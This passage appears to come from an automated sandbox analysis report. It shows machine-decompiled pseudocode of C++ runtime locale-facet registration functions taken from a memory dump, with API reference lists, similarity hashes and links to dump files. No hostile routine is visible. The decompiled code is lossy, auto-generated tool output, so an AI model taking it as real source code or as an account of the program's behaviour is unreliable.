				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t136 =  *0x6de96ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6DDB161C(0x6de96cb8);
				_t102 = _a8;
				_t50 = E6DDB171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDAA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t132, _t136, 0x14);
							E6DDD6653( &_v20, 0);
							_t137 =  *0x6de96cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6DDB161C(0x6de96cbc);
							_t109 = _a8;
							_t133 = E6DDB171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t99, _t133, _t137, 0x14);
										E6DDD6653( &_v20, 0);
										_t138 =  *0x6de96cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6DDB161C(0x6de96cc0);
										_t116 = _a8;
										_t134 = E6DDB171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6DDB1438(_t120);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6de3ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t134);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6de96cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t133);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6de96cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t132);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6de96ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDA1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA1B6
int.LIBCPMT ref: 6DDDA1CD

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDA207
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA227
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA245

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: bbfca9743c0a2672a91b88f395f22a57452b5ea87e5c089d07e7577f179f708a
Instruction ID: d20c4c3fcb32443f0da8f334c695ee292152dde405567de4e1a24862c68d328c
Opcode Fuzzy Hash: bbfca9743c0a2672a91b88f395f22a57452b5ea87e5c089d07e7577f179f708a
Instruction Fuzzy Hash: DA11E071848119CBCF01FBA0C840EBDB7B4AF54318F26400AF510AB290DF759A06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF2CF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t726 - 0x14, 0);
				_t693 =  *0x6de96dec; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6DDB161C(0x6de96d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6DDD66BA(_t726 - 0x14);
					return E6DDF0075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6DDE0F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t726 - 0x20);
							E6DDF3D74(_t726 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t676, _t693, 0x14);
							E6DDD6653(_t726 - 0x14, 0);
							_t694 =  *0x6de96dbc; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6DDB161C(0x6de96d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6DDD66BA(_t726 - 0x14);
								return E6DDF0075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6DDE0FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t726 - 0x20);
										E6DDF3D74(_t726 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t513, _t677, _t694, 0x14);
										E6DDD6653(_t726 - 0x14, 0);
										_t695 =  *0x6de96df0; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6DDB161C(0x6de96d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6DDD66BA(_t726 - 0x14);
											return E6DDF0075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6DDE1057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t726 - 0x20);
													E6DDF3D74(_t726 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t513, _t678, _t695, 0x14);
													E6DDD6653(_t726 - 0x14, 0);
													_t696 =  *0x6de96dc0; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6DDB161C(0x6de96d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6DDD66BA(_t726 - 0x14);
														return E6DDF0075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6DDE10BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t726 - 0x20);
																E6DDF3D74(_t726 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t513, _t679, _t696, 0x14);
																E6DDD6653(_t726 - 0x14, 0);
																_t697 =  *0x6de96df8; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6DDB161C(0x6de96da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6DDD66BA(_t726 - 0x14);
																	return E6DDF0075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6DDE1127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t726 - 0x20);
																			E6DDF3D74(_t726 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t513, _t680, _t697, 0x14);
																			E6DDD6653(_t726 - 0x14, 0);
																			_t698 =  *0x6de96df4; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6DDB161C(0x6de96da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6DDD66BA(_t726 - 0x14);
																				return E6DDF0075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6DDE11AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t726 - 0x20);
																						E6DDF3D74(_t726 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t513, _t681, _t698, 0x14);
																						E6DDD6653(_t726 - 0x14, 0);
																						_t699 =  *0x6de96dc8; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6DDB161C(0x6de96d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6DDD66BA(_t726 - 0x14);
																							return E6DDF0075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6DDE1230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t726 - 0x20);
																									E6DDF3D74(_t726 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t513, _t682, _t699, 0x14);
																									E6DDD6653(_t726 - 0x14, 0);
																									_t700 =  *0x6de96dc4; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6DDB161C(0x6de96d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6DDD66BA(_t726 - 0x14);
																										return E6DDF0075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6DDE12B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t726 - 0x20);
																												E6DDF3D74(_t726 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t513, _t683, _t700, 0x14);
																												E6DDD6653(_t726 - 0x14, 0);
																												_t701 =  *0x6de96dd8; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6DDB161C(0x6de96d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6DDD66BA(_t726 - 0x14);
																													return E6DDF0075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6DDE1339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t726 - 0x20);
																															E6DDF3D74(_t726 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t513, _t684, _t701, 0x14);
																															E6DDD6653(_t726 - 0x14, 0);
																															_t702 =  *0x6de96db0; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6DDB161C(0x6de96d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6DDD66BA(_t726 - 0x14);
																																return E6DDF0075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6DDE13A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t726 - 0x20);
																																		E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t513, _t685, _t702, 0x14);
																																		E6DDD6653(_t726 - 0x14, 0);
																																		_t703 =  *0x6de96ddc; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6DDB161C(0x6de96d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6DDD66BA(_t726 - 0x14);
																																			return E6DDF0075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6DDE1409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t726 - 0x20);
																																					E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t513, _t686, _t703, 0x14);
																																					E6DDD6653(_t726 - 0x14, 0);
																																					_t704 =  *0x6de96de0; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6DDB161C(0x6de96d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6DDD66BA(_t726 - 0x14);
																																						return E6DDF0075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6DDE1471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t726 - 0x20);
																																								E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t513, _t687, _t704, 0x14);
																																								E6DDD6653(_t726 - 0x14, 0);
																																								_t705 =  *0x6de96dfc; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6DDB161C(0x6de96da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6DDD66BA(_t726 - 0x14);
																																									return E6DDF0075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6DDE14EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t726 - 0x20);
																																											E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t513, _t688, _t705, 0x14);
																																											E6DDD6653(_t726 - 0x14, 0);
																																											_t706 =  *0x6de96dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6DDB161C(0x6de96d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6DDD66BA(_t726 - 0x14);
																																												return E6DDF0075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6DDE1558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t726 - 0x20);
																																														E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t513, _t689, _t706, 0x14);
																																														E6DDD6653(_t726 - 0x14, 0);
																																														_t707 =  *0x6de96e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6DDB161C(0x6de96dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6DDD66BA(_t726 - 0x14);
																																															return E6DDF0075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6DDE15C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t726 - 0x20);
																																																	E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t513, _t690, _t707, 0x14);
																																																	E6DDD6653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6de96dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6DDB161C(0x6de96d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6DDB171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t726 - 0x14);
																																																		return E6DDF0075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6DDE162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6DDB1438(_t625);
																																																				E6DDF3D74(_t726 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de3851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6de3c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6DDE542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6DDF0075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t691);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6de96dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t690);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6de96e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t689);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6de96dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t688);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6de96dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t687);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6de96de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t686);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6de96ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t685);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6de96db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6DDD6FD3(__eflags, _t684);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6de96dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6DDD6FD3(__eflags, _t683);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6de96dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6DDD6FD3(__eflags, _t682);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6de96dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6DDD6FD3(__eflags, _t681);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6de96df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6DDD6FD3(__eflags, _t680);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6de96df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6DDD6FD3(__eflags, _t679);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6de96dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6DDD6FD3(__eflags, _t678);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6de96df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6DDD6FD3(__eflags, _t677);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6de96dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6DDD6FD3(__eflags, _t676);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6de96dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF2E0
int.LIBCPMT ref: 6DDDF2F7

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
